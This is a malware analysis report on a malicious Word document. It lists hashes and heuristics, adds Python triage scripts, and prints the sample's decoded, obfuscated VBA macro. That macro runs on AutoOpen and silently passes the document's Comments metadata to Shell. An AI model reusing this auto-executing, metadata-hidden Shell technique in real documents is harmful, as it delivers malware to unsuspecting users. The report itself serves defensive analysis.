Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df341a52be921e48…

MALICIOUS

Office (OLE)

Size: 75.0 KB Created: 2017-10-04 13:29:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: b71f844e531ad5318b3588428953fda0 SHA-1: a2db12f752000f6403b126f03177a1e04ba942b7 SHA-256: df341a52be921e48fc4bd499b2c27690480306d67b95c43340c9c25e618db8df
Risk Score: 212

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including an AutoOpen macro that runs as soon as the document is opened with macros enabled, a common technique for malicious documents. Heuristics indicate the presence of PowerShell strings and a shell call within the VBA code, and the ClamAV signature 'Doc.Macro.DollarShell-6346616-0' corroborates the macro-based detection. The VBA source is heavily obfuscated: almost every identifier is a random string, and most lines concatenate meaningless literals whose result is never used. The one operative statement passes a string built from ActiveDocument.BuiltInDocumentProperties("Co" + "mments") to VBA.Shell$ with window style 0 (vbHide), so the command that actually runs is stored in the document's Comments metadata, not in the macro text, and the decoded macro alone does not reveal it. Combined with the PowerShell reference, this is consistent with a downloader that fetches and runs a secondary payload.

Heuristics (8)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    aDXAewB = "pDvhfMFbg" + "dzutbFmxkcp" + "muVLeBDwmuv" + "CpdTDEzhsCr" + "TvkRsmhtEu" + "GhDgdNDMm" + "hTbVunBCc" + aWStBuE = "ttsZTpeGS" + "FRCaatWCedF" + "mPByBnXpY" + "AWTkfbmKWEf" + "bGMkSzFYBkN" + "YsvUteG" + "TaHmDcL" + "zRmehSgE"
    VBA.Shell$ "" + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + ffxpnwNrVDp + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + CDnBkkBh, 0
    EPupkmtva = "mBSdBRxC" + "DfXzmvdbXvX" + "XAFsuUWks" + "BafXsBUAfsr" + "GPhfGRnwef" + "kKnweMN" + "whCwXHHWfH" + hWhvANBw = "aAwapfAKdE" + "KNUDLwg" + "fpTevYWZ" + "BSMEdDBxyA" + "vzDUnaERvnG" + "bpEbSYeDHP" + "HcuXVnr" + dzapDpEg = "CreGSvFP" + "ytaKvrkZEb" + "pbkSexGt" + "GkRBUTyB" + "VFaVrCuy" + "FMPBenLd" + "tZMgVLGE" + ykPaTMF = "VGBsUeFs" + "kNnwrZymF" + "THuxgck" + "ypRWKNEphU" + "duwtfaA" + "BxmGSnAeZZ" + "YDvTeEXpR" + rPTAMweGzte = "zGRRxbkra" + "cLrKpkwhBfy" + "KKDamAx" + "zwxxFGrVxR"  …
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Sub autoopen()
    seHKzkcdPFR
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. This generic heuristic is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Its standard description assumes that no modern VBA project was recovered; that assumption does not hold for this sample, where the VBA project was extracted as macros.bas, so here the marker only restates the AutoOpen finding above.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    Note: this URL is the standard DrawingML XML namespace identifier that Office writes into documents containing drawing objects. It is a schema name, not attacker infrastructure, and should not be treated as an indicator of compromise.
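What the heuristics above do not state is what the Shell call actually executes. In the recovered source, every identifier concatenated into the VBA.Shell$ argument except ffxpnwNrVDp is never assigned, and ffxpnwNrVDp itself is built from ActiveDocument.BuiltInDocumentProperties("Co" + "mments"); with no Option Explicit in the module, those unassigned names are Empty Variants that concatenate as "", so the command line reduces to the document's Comments property, run with window style 0 (vbHide). The following Python is an added example (not the report's tooling and not the sample's code) that resolves that idiom statically. The constructed snippet and the stand-in Comments value are assumptions, since the report does not show the real property value.

```python
"""Static resolution of the obfuscated VBA.Shell$ argument.

Added example, not code from the report or from the sample. It evaluates
the string-building idiom seen in the extracted macro to answer what the
Shell call actually runs. Assumptions (labelled): the module has no
Option Explicit, so a never-assigned name is an Empty Variant that
concatenates as ""; a line of the form  a = "x" + b = "y"  assigns the
Boolean result of a comparison and builds no string; and the Comments
property value is supplied by the analyst, because the report does not
show it.
"""
import re

# Constructed excerpt modelled on the extracted macros.bas (names shortened).
SAMPLE_VBA = '''
Attribute VB_Name = "Module1"
Sub autoopen()
helper
End Sub
Function helper()
junk1 = "shGtPsE" + "ThWKMfvu" + junk2 = "YuCnGZhL" + "LXVcxLvg"
part = "" + a1 + a2 + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + a3
VBA.Shell$ "" + a1 + part + a2 + a3, 0
End Function
'''

# Shell() window-style constants from VBA.
WINDOW_STYLES = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                 3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}

TOKEN_RE = re.compile(
    r'"([^"]*)"'                                              # string literal
    r'|ActiveDocument\.BuiltInDocumentProperties\(([^)]*)\)'  # document property
    r'|([A-Za-z_]\w*)'                                        # identifier
    r'|(\+)'                                                  # concatenation
    r'|(=)'                                                   # comparison (junk line)
)
ASSIGN_RE = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')
SHELL_RE = re.compile(r'^(?:VBA\.)?Shell\$?\s+(.+?)(?:,\s*(\d+))?\s*$')
AUTOEXEC_RE = re.compile(r'^Sub\s+(AutoOpen|Auto_Open|Document_Open)\s*\(', re.I)


def evaluate(expr, env, props):
    """Resolve a concatenation expression to (text, origins).

    origins is the set of sources that contributed non-empty text. Returns
    None when the expression contains '=', i.e. it is a comparison yielding
    a Boolean rather than a string (the junk lines in the macro).
    """
    tokens = TOKEN_RE.findall(expr)
    if any(eq for *_, eq in tokens):
        return None
    text, origins = "", set()
    for lit, prop, ident, plus, _eq in tokens:
        if plus:
            continue
        if prop:
            name = evaluate(prop, env, props)[0]        # "Co" + "mments" -> Comments
            piece, src = props.get(name, ""), {f"BuiltInDocumentProperties({name})"}
        elif ident:
            piece, src = env.get(ident, ("", set()))   # never assigned -> Empty -> ""
        else:
            piece, src = lit, {"string literal"}
        text += piece
        if piece:
            origins |= src
    return text, origins


def analyze(vba_text, props):
    """Walk the macro once, resolving assignments and the Shell call in order."""
    env = {}
    result = {"autoexec": None, "shell_command": None, "window_style": None,
              "window_style_name": None, "sources": set(), "junk_lines": 0}
    for raw in vba_text.splitlines():
        line = raw.strip()
        m = AUTOEXEC_RE.match(line)
        if m:
            result["autoexec"] = m.group(1)
            continue
        m = SHELL_RE.match(line)
        if m:
            resolved = evaluate(m.group(1), env, props)
            if resolved is not None:
                result["shell_command"], result["sources"] = resolved
                style = int(m.group(2)) if m.group(2) else None
                result["window_style"] = style
                result["window_style_name"] = WINDOW_STYLES.get(style, "not specified")
            continue
        m = ASSIGN_RE.match(line)
        if m:
            resolved = evaluate(m.group(2), env, props)
            if resolved is None:
                result["junk_lines"] += 1      # comparison line: its literals are dead
            else:
                env[m.group(1)] = resolved
    return result


if __name__ == "__main__":
    # Constructed stand-in for the real Comments value, which the report does not show.
    print(analyze(SAMPLE_VBA, {"Comments": "CONSTRUCTED COMMENTS VALUE"}))
```

To finish the triage, read the Comments field from the OLE SummaryInformation stream (for example with olemeta from oletools, or exiftool) and pass it as the props mapping; the decoded macro text never contains the command itself, so a review limited to olevba's output stops one step short of the payload.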

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  8718 bytes
SHA-256: 143acb5815e8b93ad91658706785b73307ed532be7472744f31e3d66feda2bce
Detection
ClamAV: No threats found (the Doc.Macro.DollarShell-6346616-0 detection above fired on the OLE container; the decoded VBA source on its own does not trigger it)
Obfuscation or payload: likely
484 of 586 identifiers look randomly generated (e.g. 'WwHwytdYBzh'), consistent with name-mangling obfuscation. The string literals concatenated on most lines are dead as well: each such line assigns the Boolean result of a comparison between two concatenations, so none of those fragments ever reaches the single Shell call.
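The randomly generated identifier count above is a useful obfuscation signal because legitimate VBA names are made of dictionary fragments while name-mangled ones are not. The following Python is an added example (not the report's own scoring code) of one way to produce such a count: it extracts identifiers from VBA source and flags a name when few of its letter pairs are common English bigrams or it is nearly vowel-free. The bigram and keyword lists, the thresholds, and the constructed module (mixing identifiers copied from the sample with readable ones) are all assumptions.

```python
"""Name-mangling heuristic for VBA identifiers.

Added example, not the report's own scoring code. Two signals that readable
identifiers satisfy and machine-generated ones usually do not: the share of
adjacent letter pairs that are common English bigrams, and the share of
vowels. The bigram list, the keyword list, the thresholds and the sample
module are assumptions chosen for illustration.
"""
import re

# Roughly the most frequent English letter bigrams (assumed list).
COMMON_BIGRAMS = set("""
th he in er an re on at en nd ti es or te of ed is it al ar st to nt ng se ha as ou io le
ve co me de hi ri ro ic ne ea ra ce li ch ll be ma si om ur ca el ta la ns di fo ho pe ec
pr no ct us ac ot il tr ly nc et ut ss so rs un lo wa ge ie wh ee wi em ad ol rt po we na
ul ni ts mo ow pa im mi ai sh ir su id os iv ia am fi ci vi pl ig tu ev ld ry mp fe bl ab
gh ty op wo sa ay ex ke pp
""".split())

# Keywords and object-model names excluded from the count (short illustrative list).
VBA_WORDS = {"attribute", "sub", "end", "function", "dim", "as", "string", "vba", "shell",
             "activedocument", "builtindocumentproperties", "true", "false", "set", "call",
             "if", "then", "else", "for", "next", "option", "explicit", "exit", "nothing"}

# Constructed module mixing identifiers copied from the sample with readable ones.
SAMPLE_VBA = '''
Attribute VB_Name = "Module1"
Sub autoopen()
seHKzkcdPFR
End Sub
Function seHKzkcdPFR()
vtRZabSX = "shGtPsE" + "ThWKMfvu" + rrYbUbs = "YuCnGZhL" + "LXVcxLvg"
ffxpnwNrVDp = "" + UWGtyfW + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + WwHwytdYBzh
VBA.Shell$ "" + UWGtyfW + ffxpnwNrVDp + aDXAewB, 0
End Function
Sub helper()
Dim payload As String
payload = download()
End Sub
'''


def name_stats(name):
    """Return (common-bigram share, vowel share) for a name, or None if too short."""
    letters = re.sub(r"[^a-z]", "", name.lower())
    if len(letters) < 4:
        return None
    bigrams = [letters[i:i + 2] for i in range(len(letters) - 1)]
    hits = sum(b in COMMON_BIGRAMS for b in bigrams)
    vowels = sum(c in "aeiou" for c in letters)
    return hits / len(bigrams), vowels / len(letters)


def looks_random(name, min_bigram=0.35, min_vowel=0.2):
    """True when a name fails either readability signal (thresholds are assumptions)."""
    stats = name_stats(name)
    if stats is None:
        return False
    bigram_share, vowel_share = stats
    return bigram_share < min_bigram or vowel_share < min_vowel


def identifier_report(vba_text):
    """Count distinct non-keyword identifiers and how many look machine-generated."""
    code = "\n".join(l for l in vba_text.splitlines()
                     if not l.lstrip().startswith("Attribute "))
    code = re.sub(r'"[^"]*"', '""', code)       # string literal contents are not identifiers
    names = {n for n in re.findall(r"[A-Za-z_]\w*", code)
             if n.lower() not in VBA_WORDS and name_stats(n) is not None}
    flagged = {n for n in names if looks_random(n)}
    return {"total": len(names), "flagged": flagged,
            "ratio": len(flagged) / len(names) if names else 0.0}


if __name__ == "__main__":
    r = identifier_report(SAMPLE_VBA)
    print(f"{len(r['flagged'])} of {r['total']} identifiers look randomly generated")
```

Run against the constructed module, seven of eleven identifiers are flagged, all of them copied from the sample; the readable names (autoopen, helper, payload, download) pass both signals. A ratio in the 0.8 range, as reported for macros.bas, is far outside anything a human-written module produces and is a strong stand-alone obfuscation indicator even before the Shell call is found.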
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub autoopen()
seHKzkcdPFR
End Sub
Function seHKzkcdPFR()
vtRZabSX = "shGtPsE" + "ThWKMfvu" + "hYFHkybZ" + "bRyNPbhFy" + "emwbgmmr" + "SkDHPka" + "DxTrPSEe" + rrYbUbs = "YuCnGZhL" + "LXVcxLvg" + "FMBkmTKMZ" + "svZsRMscgs" + "ghhdzMB" + "zZcKauZdwx" + "uYLnudsK" + UpFZwRKzx = "CLxGZRWmv" + "fgLKURHewv" + "eTwcHcFZRx" + "KZNVrCChX" + "gGzZZuwhk" + "MDyCXUMhn" + "rsgKwZG" + "uMrwgvrszBv"
aFakRGgNdhh = "sRkRYWsep" + "ZTkYTShR" + "weZHAEfaED" + "xNebRXYnKT" + "GthYAfxn" + "cGZgvzFW" + "CvMUbbuHLvc" + nSNVdrn = "BkfPtpvt" + "PGCkrvVfKb" + "xuuWdWMFnP" + "FnyesexB" + "VpzcHgP" + "VvDnRRdZ" + "sKPKLmty" + "zdAuahDXMH"
SgFghVUFvr = "SLWeUMpU" + "gcBAWDy" + "ZAWukrpttU" + "gszFUhM" + "MhaGPMhFUUe" + "ybeEhdukncD" + "ZfvMsShW" + LFXbcyXZ = "FzDZzPav" + "NTVGHKMm" + "WAsSMSnue" + "GnEwHcxC" + "aTSHtcPGAFS" + "DWDvaAsz" + "NrXEbFA" + hRBmuBM = "cHBuUGg" + "pvVndbY" + "wHcBysbg" + "hCkEUPD" + "fLaBsHtL" + "YGRYYvWuH" + "dzegmHWSa" + CGPaECXfs = "VecGrMMh" + "LMfgCLUeVKF" + "AvHBfvgH" + "NkxZtky" + "tmnFwKmMKU" + "mmbMcNc" + "UHceHCWHW" + "cwcPfWt"
yAgckpFzyW = "ccLMwstMgHw" + "GVzRRwrVzsz" + "KEdXnLp" + "adEtGdMKGb" + "dSBuZTugnKE" + "XTDApPTxhUd" + "atGZRzu" + PCfbEnVnPC = "ubsyVmpuuDX" + "bbnNvUREAhA" + "PyftNfT" + "MbXcVcCbTLw" + "dBMMYUgzaCh" + "ezZCefneaH" + "ppctaGLx" + dpwLTZEnHMy = "vWMddDMwCr" + "eydvtytbxr" + "xcGcKkV" + "uUWXrSUz" + "HtVGFrRDaf" + "YbuRfSVFVd" + "RLPtteC" + LCbGYeau = "ZNnnVyx" + "duvhPfCxfFp" + "ADNDUtGZUk" + "gyEtcLUFeB" + "YkgGxNuRB" + "vFLNHKvGEZ" + "vnwbMrdHtRR" + pKUUMMC = "RkvKWYLUy" + "fYMGMfMDT" + "GdxuvfNuHf" + "ULGNsUzgDa" + "WfkRgnMkMf" + "PFpXTaE" + "GnapBkZ" + "KwEgDpLDMT"
esRLTXpTvT = "bexxsgh" + "BzUnFyX" + "SntErFwm" + "pUZVavvu" + "PupndUBN" + "HAAyFxRd" + "hRYawBXRZXz" + svkCMNAazkP = "yNxfKzSBEw" + "SkUbzCEkV" + "hxBEaruFnbH" + "ZrFfcCveBw" + "xhLLkbWY" + "aGcnkmtM" + "UpyUSpdT" + vsyaEApPAnW = "SczGyMau" + "SnZSVWXKXRe" + "dbgbbTbtNM" + "PYhdGMCvDX" + "pnSTZGLKBA" + "YNWybSCW" + "sphHxTxv" + "gFrXXXvexhE"
hPWEEBGRytp = "MphscNy" + "ZdxaTeerSmT" + "hSXDFhFBkFx" + "PfTbgBKfuP" + "cvTwsXEx" + "RMfVdkYDfL" + "LZLTbrrymt" + HXwaeMRnxNw = "WsyvCLDMW" + "wpSbKhSLW" + "VSGcdBfTu" + "KAtRuuGB" + "pTGbSxfxrce" + "HadDXAWnC" + "zcRPVWLK" + CKbBdxYTmm = "RTprmZrGZVV" + "hDRAmbRD" + "dGZpkPLEuw" + "AGUBkMNs" + "sgcDWfuwbKT" + "RDkrrmpy" + "vSVVmfu" + UUzRFsxH = "KtccKvtk" + "ADaMkUtgD" + "GuaEwFeBL" + "hasunDeb" + "NYGYKZksmen" + "BVbLUUbTFYW" + "hSAHczmFxTE" + tUXFSVVu = "uXvFpwKax" + "nHnZPhzFN" + "kbhUThsSepk" + "egpvwFSSmxy" + "YwdhkPzMBG" + "HaCEySp" + "ekLxTBZXNh" + "MdCfPZe"
ffxpnwNrVDp = "" + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + KHLMdAam
CyXexBRs = "sNKnwCWh" + "RgrLxdarRHY" + "FDaVPAWEwb" + "gHYkndNMKVp" + "zdWTTBBkCnt" + "PhpARSHUze" + "BUYZpndP" + PVZgNsEfD = "EMNsdKXdWEK" + "fcaKnCnWXL" + "aZEyFhVt" + "uAnBgyzLLHp" + "UgwtueSwPd" + "ZSNfteDgMGc" + "kMskzHrUPFG" + eEuLzNm = "haXGvFBSdL" + "sVXTMZeFt" + "dGRZcXhCNHS" + "BcSZguHGM" + "EThCEndW" + "CGUYLCksN" + "LWhaUUaRBfU" + "EYtbMRNMU"
aDXAewB = "pDvhfMFbg" + "dzutbFmxkcp" + "muVLeBDwmuv" + "CpdTDEzhsCr" + "TvkRsmhtEu" + "GhDgdNDMm" + "hTbVunBCc" + aWStBuE = "ttsZTpeGS" + "FRCaatWCedF" + "mPByBnXpY" + "AWTkfbmKWEf" + "bGMkSzFYBkN" + "YsvUteG" + "TaHmDcL" + "zRmehSgE"
VBA.Shell$ "" + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + ffxpnwNrVDp + UWGtyfW + NzGWxKNHB + DuaRuKG + KbtYGFR + eZXSSbgAYnB + duChpNnHBXm + mntsaGzKpTe + xenAzZd + wAUPRbSDtR + AuTaXpbm + apwufBRG + MGMagsRDLUd + CDnBkkBh, 0
EPupkmtva = "mBSdBRxC" + "DfXzmvdbXvX" + "XAFsuUWks" + "BafXsBUAfsr" + "GPhfGRnwef" + "kKnweMN" + "whCwXHHWfH" + hWhvANBw = "aAwapfAKdE" + "KNUDLwg" + "fpTevYWZ" + "BSMEdDBxyA" + "vzDUnaERvnG" + "bpEbSYeDHP" + "HcuXVnr" + dzapDpEg = "CreGSvFP" + "ytaKvrkZEb" + "pbkSexGt" + "GkRBUTyB" + "VFaVrCuy" + "FMPBenLd" + "tZMgVLGE" + ykPaTMF = "VGBsUeFs" + "kNnwrZymF" + "THuxgck" + "ypRWKNEphU" + "duwtfaA" + "BxmGSnAeZZ" + "YDvTeEXpR" + rPTAMweGzte = "zGRRxbkra" + "cLrKpkwhBfy" + "KKDamAx" + "zwxxFGrVxR" + "rNbbFEtxW" + "YhZKzxFTAV" + "xWHTWfMSXv" + "dgpTEdxASXy"
YZNymSgfsR = "BcenFSdbCsN" + "EkNywSGwVVb" + "yNFLuuaTznD" + "eZWMmndaRF" + "aYSavbDmVs" + "LXXAdau" + "SwFtCsp" + NKCHapn = "deVXyDFeN" + "vyLdGMB" + "tSWASKhcsw" + "tycVLwPZDrb" + "aeUWfnvxkK" + "zySzEkrDrF" + "aBVnEXD" + gHbzKMEwbC = "PPdWRffvN" + "vbyLsheBy" + "ZGsYbxN" + "KawkDzBpYCg" + "TUpfLauXC" + "aRChxaFK" + "YpfCrXUmhvN" + FcuUVanAGA = "dBytenFw" + "dtzRDNCFMKr" + "nCumKSkHBRT" + "FHLCLxRXA" + "EfPrFaST" + "MxEKnFFChEZ" + "VDpnPasZ" + "YGWUTcFWreH"
aAFKUKhsg = "EsrShMyF" + "DCPEwwvAaZ" + "pXxndaZb" + "rTBTbymsF" + "KPSwcCXu" + "cuZwhWrxAD" + "yTzUNZkWES" + GswFPsAXA = "kbLSYTy" + "TdpaStFF" + "cddrBwCD" + "UzUtUKLYFm" + "wyUuVFfrH" + "DWTWHBxPyz" + "brVDTDFLYE" + GapMZeAN = "WtgrrhfzzA" + "LEraMzD" + "VydtRBK" + "WswXFwz" + "dfXkcHLVex" + "gBYuXKLFS" + "cXuEenHrV" + ukGCHmF = "YssMLBtytWp" + "tMympmerhp" + "YkxTBKWp" + "YvVXVSBV" + "mfgEWyrVx" + "wwUHeneW" + "LVhfKntT" + wCByRkTCEC = "cCnfAhk" + "VULgmMcL" + "tMeentL" + "WUdGAnNeMh" + "knbdKHHf" + "gCUAGwkw" + "BdMGRsxRmCm" + ApwtDVcUUPt = "ayKAKTUUcah" + "TaGPZUttK" + "DasbnEGvP" + "ssCRcKPL" + "tACwuSFkBSV" + "YaHsWmbBc" + "SmgwcuhArdw" + "dedxCFg"
TWYATfSxCsP = "xWgUAMV" + "ThfsWYAupnA" + "SUvsHKWdA" + "VavpcveVhfb" + "rZtzAuhDgB" + "zRsGSpRBPW" + "MmzaGFhAD" + TbssXKE = "ssTwcUTk" + "MpxybRnpW" + "MzwbCAWwM" + "VPrftYCHgD" + "PGHNAdFkCEZ" + "YeAcKpBamT" + "LAwxTnrD" + hAzmBEUky = "eAWSuvxzgY" + "EnbNbFbbnNm" + "LLkWVYg" + "BkESmkMT" + "ZZpudLG" + "GvTKtKCD" + "fXFLhDMnG" + YsvYmAa = "UdTWeGTDCyr" + "VaZrkmTk" + "TKGwrWf" + "ycCNeZXFt" + "bhGVHGHE" + "FPELsbPeFN" + "nZnuBarLPu" + NSNCeFZSZBc = "UZTDrReRWU" + "SLHAwAGYWE" + "nVGmRatHm" + "WwHwytdYBzh" + "GphVCWG" + "xrFKfpXF" + "KaxkhMBmAfa" + "ALKWsgcpnM"
FtdTgAHWRZ = "EbsBuhzPTD" + "ysdXCYaTm" + "YASAwVgd" + "BGwHBBmVNAR" + "VurNmhhWYB" + "mkZcNcGbHRD" + "SraCbwLbCR" + tfpzRGGEU = "acKNrCSLYmE" + "ZZtMFsm" + "htaxysGC" + "BUSuuTyu" + "yDgHkhzh" + "xczhzGNw" + "MzKTdLA" + hhdrvLVxC = "esZmFStC" + "BcubaLhTs" + "PMZFayk" + "NUYFcehWzdd" + "ZYRyreLHm" + "baUxyEn" + "FrXyecDpYUa" + wwWaSYgnL = "mUXRcskBg" + "DmPbFMTDC" + "DzynkmUtdp" + "LvmTkRM" + "mgMnbXXnU" + "mbDwWETR" + "HfMunkN" + uEMaRSr = "NWAZULTt" + "sfUBNAt" + "nceEAKz" + "aWmwxthSHS" + "EznLRxveW" + "gbEEZknRd" + "TaDFyMmA" + ZyecenZkMX = "EvPuWpr" + "PcNkdvggXZx" + "ZLGhGxyNCXy" + "LkgKHhgsU" + "pfwVBRPfT" + "YCuBWEzk" + "RtybwELN" + "taexZWn"
LTVwCahheyr = "MBgyXcm" + "cKbhaubzP" + "hctUSKRVzG" + "NcLMZmD" + "nCxSpAkLz" + "vTeDDYpWp" + "xzwbExcgaaf" + yskgvcMre = "TndunLufbPM" + "TEKbTuZWD" + "fTZTkxZZbcg" + "VfgUbBXBcvg" + "tcfpfERb" + "SeaVTaN" + "wuTMUDMgZ" + amneDeAD = "SdTpzKCMp" + "DKHeRhmfMCp" + "mYXtsXehzkb" + "NWndSxtu" + "rHgSPaY" + "aywZUVwPzxy" + "kvXeAeEdEZy" + gunARyn = "yuEkXxexAYr" + "yRMxfkMHf" + "wnctRwTsdcb" + "MtetMGmF" + "VVZHSmFEVV" + "tzkgeWrexP" + "uXnfZvbAy" + "HPvNTkevvzu"
FsrnUsK = "gwYFzeVY" + "vkHBDbPgva" + "CypaCYTXsF" + "UMeLTrMuMEp" + "gKpwXeVVyM" + "KPCMtrzv" + "RhChrYUhWEK" + vfbswyrx = "KdtVRXn" + "xSLeaXrAUk" + "aLRsEDpLKb" + "pNpwASRYunL" + "pxppTUcGUna" + "AFuGSAAgv" + "rNVPTGLph" + nGKNtMeCn = "vRGxbDdDK" + "wvSBUSYsYT" + "bXUsdfpTXW" + "nVdwfgW" + "ryhLMzemM" + "gMCZtWrhcBf" + "BkxtHLmWE" + ESTZhvxMask = "aEbPgSaMTXe" + "sBLwYUss" + "yCUyUxZdk" + "FDHrDGZe" + "PAmGXmd" + "aaPDuDDBy" + "zaFSdgZGgP" + YnpKeFraH = "YVKcseC" + "HLUvUATEVf" + "tddxPHR" + "cZuwHYZ" + "ukmUEFUAh" + "ceUDAZyMW" + "MySXnxhf" + TZemdBCwB = "LbMunRLs" + "YWyvwNMGy" + "hAakeNMfA" + "MYVvtmU" + "SVGZGSZSrm" + "YSvauRSyZvw" + "ckKtKXwdpcf" + "cXmPgKt"
XrykMLRNdR = "rZWGbKMxNb" + "uPNaWehsrP" + "UtgGRdDf" + "bUBWzTUFaPh" + "WEmkMMPHc" + "XMrpyRvSY" + "tCGSzrwLw" + eMtzfYXrxT = "mbxDWGdShx" + "ArdgVug" + "XzErHhdr" + "XAfDYDKPF" + "WNFkgwz" + "EMMPNxNrEzT" + "hYzgyLnWh" + WZEZMNCD = "rDLyPhLdMb" + "RTGDcTXsbE" + "DVBDCgXd" + "WdNBndCydSa" + "xnkBGUxLPu" + "FHtWfbvNRS" + "DtuUDXdpcrR" + apLUnDGe = "ceHLyhEHLaz" + "vKStFgB" + "crYGnEnHfyU" + "bkgrvKNkxB" + "MgRghYt" + "vyGtvpYnv" + "HhhXnPTh" + "BDhhPzARgy"
End Function